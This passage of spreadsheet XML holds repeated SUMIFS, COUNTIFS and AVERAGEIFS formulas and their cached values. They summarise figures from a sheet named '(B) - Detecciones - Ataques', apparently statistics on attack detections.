        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5833333333</v>
      </c>
      <c r="W134" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X134" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>2017.142857</v>
      </c>
      <c r="Y134" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>1.2</v>
      </c>
      <c r="Z134" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>1133.353313</v>
      </c>
      <c r="AA134" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>3.546153846</v>
      </c>
      <c r="AB134" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>5.572916667</v>
      </c>
      <c r="AC134" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>2.9</v>
      </c>
      <c r="AD134" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.7400133524</v>
      </c>
      <c r="AE134" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>1.1</v>
      </c>
      <c r="AF134" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.7954545455</v>
      </c>
      <c r="AG134" s="271"/>
      <c r="AH134" s="352" t="s">
        <v>2553</v>
      </c>
      <c r="AI134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.07726024584</v>
      </c>
      <c r="AJ134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>3</v>
      </c>
      <c r="AL134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.1802618328</v>
      </c>
      <c r="AN134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3635338346</v>
      </c>
      <c r="AR134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AS134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>1</v>
      </c>
      <c r="AU134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>3.5</v>
      </c>
      <c r="AV134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1.333333333</v>
      </c>
      <c r="AW134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1.333333333</v>
      </c>
      <c r="AY134" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB134" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>4705.333333</v>
      </c>
      <c r="BD134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>1</v>
      </c>
      <c r="BF134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>1.5</v>
      </c>
      <c r="BG134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>1</v>
      </c>
      <c r="BI134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>1904.259349</v>
      </c>
      <c r="BN134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>311.2649333</v>
      </c>
      <c r="BO134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1.1</v>
      </c>
      <c r="BR134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>2.5</v>
      </c>
      <c r="BT134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>15</v>
      </c>
      <c r="BZ134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1</v>
      </c>
      <c r="CA134" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC134" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>2</v>
      </c>
      <c r="CG134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>2</v>
      </c>
      <c r="CI134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>22</v>
      </c>
      <c r="CJ134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>6</v>
      </c>
      <c r="CL134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>6.625</v>
      </c>
      <c r="CN134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1.25</v>
      </c>
      <c r="CP134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>10</v>
      </c>
      <c r="CQ134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>2</v>
      </c>
      <c r="CR134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.346041365</v>
      </c>
      <c r="CT134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.007984031936</v>
      </c>
      <c r="CU134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>1</v>
      </c>
      <c r="CW134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>2</v>
      </c>
      <c r="CY134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH134" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI134" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ134" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ER$3:$ER$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.181818182</v>
      </c>
      <c r="DK134" s="271"/>
    </row>
    <row r="135">
      <c r="J135" s="277"/>
      <c r="K135" s="512"/>
      <c r="L135" s="512"/>
      <c r="M135" s="512"/>
      <c r="N135" s="512"/>
      <c r="O135" s="278"/>
      <c r="Q135" s="271"/>
      <c r="R135" s="352" t="s">
        <v>2554</v>
      </c>
      <c r="S135" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>1.624763532</v>
      </c>
      <c r="T135" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.9998561358</v>
      </c>
      <c r="U135" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>1.873446115</v>
      </c>
      <c r="V135" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>2.138888889</v>
      </c>
      <c r="W135" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>2</v>
      </c>
      <c r="X135" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GH$3:$GH$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
